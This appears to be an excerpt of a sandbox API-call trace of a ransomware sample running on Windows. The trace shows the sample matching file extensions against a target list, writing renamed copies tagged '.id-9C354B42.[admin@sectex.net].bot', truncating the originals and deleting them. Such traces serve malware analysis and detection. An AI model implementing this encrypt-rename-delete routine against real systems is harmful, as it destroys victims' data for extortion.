	[0148.285] SetEndOfFile (hFile=0x388) returned 1
	[0148.285] CloseHandle (hObject=0x388) returned 1
	[0148.285] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.285] SetEndOfFile (hFile=0x3c0) returned 1
	[0148.287] CloseHandle (hObject=0x3c0) returned 1
	[0148.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.316] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd")) returned 1
	[0148.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.398] lstrlenW (lpString=".doc") returned 4
	[0148.398] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.398] lstrlenW (lpString=".docx") returned 5
	[0148.399] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0148.399] lstrlenW (lpString=".pdf") returned 4
	[0148.399] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString=".xls") returned 4
	[0148.399] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.399] lstrlenW (lpString=".xlsx") returned 5
	[0148.399] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0148.399] lstrlenW (lpString=".ppt") returned 4
	[0148.399] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.399] lstrlenW (lpString=".zip") returned 4
	[0148.399] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.399] lstrlenW (lpString=".rar") returned 4
	[0148.399] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString=".bz2") returned 4
	[0148.399] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString=".7z") returned 3
	[0148.399] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.399] lstrlenW (lpString=".dbf") returned 4
	[0148.399] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.399] lstrlenW (lpString=".1cd") returned 4
	[0148.399] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.399] lstrlenW (lpString=".jpg") returned 4
	[0148.399] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.399] lstrlenW (lpString=".doc") returned 4
	[0148.399] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString=".docx") returned 5
	[0148.400] lstrcmpiW (lpString1=".docx", lpString2="E.VRD") returned -1
	[0148.400] lstrlenW (lpString=".pdf") returned 4
	[0148.400] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString=".xls") returned 4
	[0148.400] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.400] lstrlenW (lpString=".xlsx") returned 5
	[0148.400] lstrcmpiW (lpString1=".xlsx", lpString2="E.VRD") returned -1
	[0148.400] lstrlenW (lpString=".ppt") returned 4
	[0148.400] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.400] lstrlenW (lpString=".zip") returned 4
	[0148.400] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.400] lstrlenW (lpString=".rar") returned 4
	[0148.400] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString=".bz2") returned 4
	[0148.400] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString=".7z") returned 3
	[0148.400] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.400] lstrlenW (lpString=".dbf") returned 4
	[0148.400] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.400] lstrlenW (lpString=".1cd") returned 4
	[0148.400] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD") returned 56
	[0148.400] lstrlenW (lpString=".jpg") returned 4
	[0148.400] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.401] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0148.401] lstrlenW (lpString="MSTORE_COL.HXT") returned 14
	[0148.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.401] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=206) returned 1
	[0148.401] CloseHandle (hObject=0x31c) returned 1
	[0148.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt")) returned 0x20
	[0148.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.402] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.402] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.402] GetLastError () returned 0x0
	[0148.402] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xce, lpOverlapped=0x0) returned 1
	[0148.403] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0148.404] ReadFile (in: hFile=0x31c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.404] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0148.404] SetEndOfFile (hFile=0x3c0) returned 1
	[0148.404] CloseHandle (hObject=0x3c0) returned 1
	[0148.405] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.405] SetEndOfFile (hFile=0x31c) returned 1
	[0148.415] CloseHandle (hObject=0x31c) returned 1
	[0148.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.680] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxt")) returned 1
	[0148.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.721] lstrlenW (lpString=".doc") returned 4
	[0148.721] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.721] lstrlenW (lpString=".docx") returned 5
	[0148.721] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.721] lstrlenW (lpString=".pdf") returned 4
	[0148.721] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.721] lstrlenW (lpString=".xls") returned 4
	[0148.721] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.721] lstrlenW (lpString=".xlsx") returned 5
	[0148.721] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.721] lstrlenW (lpString=".ppt") returned 4
	[0148.721] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.721] lstrlenW (lpString=".zip") returned 4
	[0148.721] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.721] lstrlenW (lpString=".rar") returned 4
	[0148.721] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.722] lstrlenW (lpString=".bz2") returned 4
	[0148.722] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.722] lstrlenW (lpString=".7z") returned 3
	[0148.722] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.722] lstrlenW (lpString=".dbf") returned 4
	[0148.722] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.722] lstrlenW (lpString=".1cd") returned 4
	[0148.722] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.722] lstrlenW (lpString=".jpg") returned 4
	[0148.722] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.722] lstrlenW (lpString=".doc") returned 4
	[0148.722] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.722] lstrlenW (lpString=".docx") returned 5
	[0148.722] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.722] lstrlenW (lpString=".pdf") returned 4
	[0148.722] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.722] lstrlenW (lpString=".xls") returned 4
	[0148.722] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.722] lstrlenW (lpString=".xlsx") returned 5
	[0148.722] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.723] lstrlenW (lpString=".ppt") returned 4
	[0148.723] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.723] lstrlenW (lpString=".zip") returned 4
	[0148.723] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.723] lstrlenW (lpString=".rar") returned 4
	[0148.723] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.723] lstrlenW (lpString=".bz2") returned 4
	[0148.723] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.723] lstrlenW (lpString=".7z") returned 3
	[0148.723] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.723] lstrlenW (lpString=".dbf") returned 4
	[0148.723] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.723] lstrlenW (lpString=".1cd") returned 4
	[0148.723] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXT") returned 62
	[0148.723] lstrlenW (lpString=".jpg") returned 4
	[0148.723] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.723] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0148.723] lstrlenW (lpString="OIS_COL.HXC") returned 11
	[0148.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.755] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=611) returned 1
	[0148.755] CloseHandle (hObject=0x3f0) returned 1
	[0148.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc")) returned 0x20
	[0148.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.757] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.757] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.758] GetLastError () returned 0x0
	[0148.758] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x263, lpOverlapped=0x0) returned 1
	[0148.760] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x270, lpOverlapped=0x0) returned 1
	[0148.761] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.761] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0148.761] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.761] CloseHandle (hObject=0x3f4) returned 1
	[0148.762] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.762] SetEndOfFile (hFile=0x3f0) returned 1
	[0148.764] CloseHandle (hObject=0x3f0) returned 1
	[0148.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.764] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxc")) returned 1
	[0148.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.765] lstrlenW (lpString=".doc") returned 4
	[0148.765] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.765] lstrlenW (lpString=".docx") returned 5
	[0148.765] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.765] lstrlenW (lpString=".pdf") returned 4
	[0148.765] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.765] lstrlenW (lpString=".xls") returned 4
	[0148.765] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.765] lstrlenW (lpString=".xlsx") returned 5
	[0148.765] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.765] lstrlenW (lpString=".ppt") returned 4
	[0148.765] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.765] lstrlenW (lpString=".zip") returned 4
	[0148.765] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.765] lstrlenW (lpString=".rar") returned 4
	[0148.765] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.765] lstrlenW (lpString=".bz2") returned 4
	[0148.765] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.765] lstrlenW (lpString=".7z") returned 3
	[0148.765] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.765] lstrlenW (lpString=".dbf") returned 4
	[0148.766] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.766] lstrlenW (lpString=".1cd") returned 4
	[0148.766] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.766] lstrlenW (lpString=".jpg") returned 4
	[0148.766] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.766] lstrlenW (lpString=".doc") returned 4
	[0148.766] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0148.766] lstrlenW (lpString=".docx") returned 5
	[0148.766] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0148.766] lstrlenW (lpString=".pdf") returned 4
	[0148.766] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0148.766] lstrlenW (lpString=".xls") returned 4
	[0148.766] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0148.766] lstrlenW (lpString=".xlsx") returned 5
	[0148.766] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0148.766] lstrlenW (lpString=".ppt") returned 4
	[0148.766] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0148.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.766] lstrlenW (lpString=".zip") returned 4
	[0148.766] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0148.766] lstrlenW (lpString=".rar") returned 4
	[0148.766] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0148.766] lstrlenW (lpString=".bz2") returned 4
	[0148.766] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0148.766] lstrlenW (lpString=".7z") returned 3
	[0148.766] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0148.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.767] lstrlenW (lpString=".dbf") returned 4
	[0148.767] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0148.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.767] lstrlenW (lpString=".1cd") returned 4
	[0148.767] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0148.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXC") returned 59
	[0148.767] lstrlenW (lpString=".jpg") returned 4
	[0148.767] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0148.767] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0148.767] lstrlenW (lpString="OIS_COL.HXT") returned 11
	[0148.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.767] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=203) returned 1
	[0148.768] CloseHandle (hObject=0x3f0) returned 1
	[0148.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt")) returned 0x20
	[0148.768] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0148.768] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.768] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0148.769] GetLastError () returned 0x0
	[0148.769] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xcb, lpOverlapped=0x0) returned 1
	[0148.770] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0148.771] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.771] WriteFile (in: hFile=0x3f4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0148.771] SetEndOfFile (hFile=0x3f4) returned 1
	[0148.771] CloseHandle (hObject=0x3f4) returned 1
	[0148.771] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.771] SetEndOfFile (hFile=0x3f0) returned 1
	[0148.773] CloseHandle (hObject=0x3f0) returned 1
	[0148.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_col.hxt")) returned 1
	[0148.774] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_COL.HXT") returned 59
